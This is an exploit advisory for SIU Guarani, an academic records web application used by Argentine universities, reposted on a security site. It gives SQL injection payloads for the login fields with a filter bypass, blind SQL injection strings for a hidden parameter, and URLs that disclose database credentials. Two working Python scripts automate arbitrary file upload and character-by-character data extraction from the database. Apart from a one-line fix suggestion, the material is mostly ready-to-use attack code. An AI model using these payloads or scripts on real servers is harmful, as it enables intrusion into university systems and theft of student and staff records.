首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
SIU Guarani Multiple Remote Vulnerabilities
来源:www.vfcocus.net 作者:proudhon 发布时间:2008-12-09  
        #
    #   #   #
    ### # ##
      #####             multiple remote vulnerabilities
  ############              siu guarani
     ######
    ##  #  ##
        #


general information
-------------------
bug type : multiple remote vulnerabilities

software name : SIU Guarani

vendor : SIU (www.siu.edu.ar)

authors : proudhon & Ubik

date : the 341st day of the year 2008

contact : N/A

description : SIU-Guarani is a web application which keeps information about academic activities. It's widely used in Argentina by national
universities. for more information, contact the vendor's web page.

disclaimer
---------
all the information and code given in this document is provided "as is", for educational purposes only. the authors will not be responsible for any
damage.

technical information
---------------------
disclosure of database information
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
you can get some of the database information, such as user and password, used by Guarani. this bug is almost fixed by the vendor.
http://guarani_server/includes/elegirConexion.php

file upload
^^^^^^^^^^^
given a valid phpsessid, you can upload files to the server. this bug is fixed in some versions.
http://guarani_server/a_docentes/subirArchivo.php

sql injection
^^^^^^^^^^^^^
http://guarani_server/w_inicial.php
OR
http://guarani_server/inicial.php

Username (Identificacion): ' || (SQL Statement) || '
Password (Clave): **** (anything)

example:
Username (Identificacion): ' || DBINFO('dbhostname') || '
Password (Clave): **** (anything)

just remember they are using Informix!
sql injection is partialy solved in some places.

in order to fool some protections, such as "[Informix]An illegal character has been found in the statement.", you can use %27 instead of '.

blind sql injection
^^^^^^^^^^^^^^^^^^^
hidden parameter "operacion" in:

http://guarani_server/a_general/verMensajes.php
http://guarani_server/a_general/autentificarse.php

... and probably more!

example (via POST): http://guarani_server/a_general/verMensajes.php?operacion=op0001' || (case when 10<1 then '1' else '2' end) || '

another example (in autentificarse.php):

operacion=op0001' || (SELECT '1' FROM systables where tabid = 1) || ' 
(no error, because it returns a single value)
operacion=op0001' || (SELECT '1' FROM systables where tabid <> 1) || '
(error, because there are multiple results)

patchs / work arounds
---------------------
among other things, the function which loads the foreign parameters should check for special characters.
the software itself seems to be pretty buggy, releasing the software code under a license like BSD or GPL would help to improve its security.

proof of concept
----------------
file upload
^^^^^^^^^^^
#!/bin/python
# target : SIU Guarani
# file : 4790
# quote : "el poporembo como una flor", quintin
# disclaimer : all the information and code given in this document is provided "as is", for educational purposes only. the authors will not be
# responsible for any damage.

import pycurl
import StringIO
import sys

if len(sys.argv) < 3:
  print "SIU guarani file upload"
  print "usage : " + sys.argv[0] + " <server> <local file>"
  print "example : " + sys.argv[0] + " someuni.edu.ar/somedir someporn.jpg"
  sys.exit(1)

print "getting phpsessid.."
c = pycurl.Curl()
c.setopt(c.URL, "http://" + sys.argv[1] + "/inicial.php")
c.setopt(c.COOKIEJAR, "/tmp/guaranicookie")
c.setopt(c.WRITEFUNCTION, (lambda x : None))
c.perform()
c.close()

print "uploading file.."
r = StringIO.StringIO()
c = pycurl.Curl()
c.setopt(c.POST, 1)
c.setopt(c.URL, "http://" + sys.argv[1] + "/a_docentes/subirArchivo.php")
c.setopt(c.HTTPPOST, [("archivo", (c.FORM_FILE, sys.argv[2]))])
c.setopt(c.COOKIEFILE, "/tmp/guaranicookie")
c.setopt(c.WRITEFUNCTION, r.write)
c.perform()
r.seek(0)
s = r.read()
r.close()
c.close()
s = (s.split("'../library/bajarArchivo.php?qs="))[1]
s = (s.split("'"))[0]
print "your download link is http://" + sys.argv[1] + "/library/bajarArchivo.php?qs=" + s
print "in order to download the file, first you'll need to join http://" + sys.argv[1] + "/ with your web browser"
# EOF

bind sql injection
^^^^^^^^^^^^^^^^^^
#!/bin/python
# target : SIU Guarani
# file : 4791
# quote : "el poporembo como una flor", quintin
# disclaimer : all the information and code given in this document is provided "as is", for educational purposes only. the authors will not be
# responsible for any damage.

import pycurl
import StringIO
import sys

def dic_sql(s, i, x, y):
  num = "SUBSTRING(" + s  + " FROM " + str(i) + " FOR 1)"
  return "(" + num + " >= '" + chr(x) + "') AND (" + num + " <= '" + chr(y) + "')"

maxsize = 32

if len(sys.argv) < 3:
  print "SIU guarani blind sql execution"
  print "usage : " + sys.argv[0] + " <server> <sql string to match> [maxsize=32]"
  print "example : " + sys.argv[0] + " http://someuni.edu.ar/somedir USER"
  print "remember, it's an informix database"
  print "https support!"
  sys.exit(1)

if len(sys.argv) > 3:
  maxsize = int(sys.argv[3])

print "getting phpsessid.."
c = pycurl.Curl()

if (sys.argv[1][0:5] == "https"):
  c.setopt(c.SSL_VERIFYPEER, 0)
c.setopt(c.URL, sys.argv[1] + "/inicial.php")
c.setopt(c.COOKIEJAR, "/tmp/guaranicookie")
c.setopt(c.WRITEFUNCTION, (lambda x : None))
c.perform()
c.close()

print "cracking sql result.."

for l in range(1, maxsize + 1):
  i = 48
  f = 125
  c = pycurl.Curl()
  r = StringIO.StringIO()
  if (sys.argv[1][0:5] == "https"):
    c.setopt(c.SSL_VERIFYPEER, 0)
  c.setopt(c.POST, 1)
  c.setopt(c.URL, sys.argv[1] + "/a_general/verMensajes.php")
  c.setopt(c.COOKIEFILE, "/tmp/guaranicookie")
  c.setopt(c.WRITEFUNCTION, r.write)

  while i <> f:
    sql = dic_sql(sys.argv[2], l, i, i+(f-i)/2)
    c.setopt(c.HTTPPOST, [("operacion", "gda0011' || case when (" + sql + ") then '1' else '2' end || '"), ("ver", "T")])
    c.perform()
    r.seek(0)
    s = r.read()
    r.truncate(0)
    if len(s) == 0:
      print "uhm... looks like a wrong sql string!"
      sys.exit(1)
    if len(s.split("No hay mensajes.")) > 1 or len(s.split("Anuncio")) > 1:
      f = i + (f - i) / 2
    else:
      i = i + (f - i) / 2 + 1
  r.close()
  c.close()
  if i == 125:
    break
  sys.stdout.write(chr(i))
  sys.stdout.flush()
sys.stdout.write('\n')
# EOF

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MG2 0.5.1 (filename) Remote Co
·phpMyAdmin 3.1.0 (XSRF) SQL In
·Simple Directory Listing 2 Cro
·w3blabor CMS 3.0.5 Arbitrary F
·XAMPP 1.6.8 (XSRF) Change Admi
·PayPal eStore Admin Password C
·phpBB 3 (Mod Tag Board <= 4) R
·Bonza Cart <= 1.10 Admin Passw
·Neostrada Livebox Router Remot
·DL PayCart <= 1.34 Admin Passw
·DD-WRT v24-sp1 (XSRF) Cross Si
·IPNPro3 <= 1.44 Admin Password
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved